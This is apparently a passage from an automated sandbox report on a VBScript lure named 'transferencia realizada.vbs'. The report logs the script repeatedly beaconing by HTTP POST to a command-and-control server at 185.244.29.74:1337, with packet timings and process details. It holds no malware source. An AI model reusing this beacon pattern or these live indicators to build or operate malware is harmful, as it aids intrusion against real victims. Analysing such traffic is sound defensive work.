                          Oct 2, 2024 18:40:45.438323021 CEST497131337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:45.443322897 CEST133749713185.244.29.74192.168.2.7
                          Oct 2, 2024 18:40:47.458517075 CEST133749713185.244.29.74192.168.2.7
                          Oct 2, 2024 18:40:47.458741903 CEST497131337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:47.458777905 CEST497131337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:47.463692904 CEST133749713185.244.29.74192.168.2.7
                          Oct 2, 2024 18:41:18.592443943 CEST497141337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:18.597975969 CEST133749714185.244.29.74192.168.2.7
                          Oct 2, 2024 18:41:18.598089933 CEST497141337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:18.598246098 CEST497141337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:18.603413105 CEST133749714185.244.29.74192.168.2.7
                          Oct 2, 2024 18:41:20.506069899 CEST133749714185.244.29.74192.168.2.7
                          Oct 2, 2024 18:41:20.506175041 CEST497141337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:20.506273031 CEST497141337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:20.511265993 CEST133749714185.244.29.74192.168.2.7
                          Oct 2, 2024 18:41:51.624037981 CEST497151337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:51.629070997 CEST133749715185.244.29.74192.168.2.7
                          Oct 2, 2024 18:41:51.629184008 CEST497151337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:51.629388094 CEST497151337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:51.634249926 CEST133749715185.244.29.74192.168.2.7
                          Oct 2, 2024 18:41:53.638528109 CEST133749715185.244.29.74192.168.2.7
                          Oct 2, 2024 18:41:53.638689995 CEST497151337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:53.638787985 CEST497151337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:41:53.644143105 CEST133749715185.244.29.74192.168.2.7
                          • 185.244.29.74:1337
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.749700185.244.29.7413376596C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 18:38:00.151276112 CEST227OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:1337
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.749706185.244.29.7413376596C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 18:38:33.187330008 CEST227OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:1337
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.749710185.244.29.7413376596C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 18:39:06.247293949 CEST227OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:1337
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.749711185.244.29.7413376596C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 18:39:39.316751003 CEST227OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:1337
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.749712185.244.29.7413376596C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 18:40:12.383682966 CEST227OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:1337
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.749713185.244.29.7413376596C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 18:40:45.438323021 CEST227OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:1337
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.749714185.244.29.7413376596C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 18:41:18.598246098 CEST227OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:1337
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.749715185.244.29.7413376596C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 18:41:51.629388094 CEST227OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:1337
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Target ID:0
                          Start time:12:37:58
                          Start date:02/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs"
                          Imagebase:0x7ff739d30000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          No disassembly